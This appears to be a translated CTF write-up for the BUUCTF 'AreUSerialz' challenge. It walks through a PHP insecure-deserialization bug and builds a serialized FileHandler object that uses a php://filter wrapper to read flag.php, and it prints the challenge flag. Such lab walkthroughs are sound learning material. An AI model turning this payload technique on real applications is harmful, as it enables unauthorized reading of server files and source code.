Buuctf breakthrough diary -- [netding cup 2020 Qinglong group]areuserialz

Finally, I made a reverse order , Maybe I understand a little bit of reverse order

Write my own understanding here

Enter the page

Reverse order , Let's first look at the key code

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

I won't explain anything else , Look directly at

if(is_valid($str))  // This is the code to be analyzed 


 This is is_valid Method 

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

You can see that it is to judge the incoming characters , Make sure you are a printable character

The next step is to directly reverse the output

Then go back to the class and see how to output our flag

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }
    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

You can see Here's the output , That is, we have to meet now op==2

So I put the above $op Change to 2

What is the output ? It must be what we want flag, So now the goal is to make $res=flag

Because it calls again read() Method , So let's take a look read()

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

It can be seen that file_get_contents Function assigns the result to $res, So you can't let $res=flag 了

Need to use pseudo Protocol , because file_get_contents Is to read the path or URL

So we put $filename="php://filter/read=convert.base64-encode/resource=flag.php";

So change the first three lines to this :

    protected $op=2;
    protected $filename="php://filter/read=convert.base64-encode/resource=flag.php";
    protected $content;

Then serialize locally

  This is the result

O:11:"FileHandler":3:{s:5:"*op";i:2;s:11:"*filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:10:"*content";N;}

  Discovery failed , This is because protected It's a private property , Direct reverse sequencing will cause problems

This is protected The serialized format of (\00 Is the problem , It's a space, so there's a problem )

 data type : Property name length :"\00*\00 Property name "; data type : Property value length :" Property value ";

So we need to change the variable type , Change to public( Don't change it to Private, This is also a private property )

Change to

    public $op=2;
    public $filename="php://filter/read=convert.base64-encode/resource=flag.php";
    public $content;

Then serialize to get the result we want

O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";N;}

Input , obtain base64 After flag

After decoding :

<?php $flag='flag{a5b5f442-946d-4bc2-8eb4-b587ec1cb4f2}';

flag Namely

 flag{a5b5f442-946d-4bc2-8eb4-b587ec1cb4f2}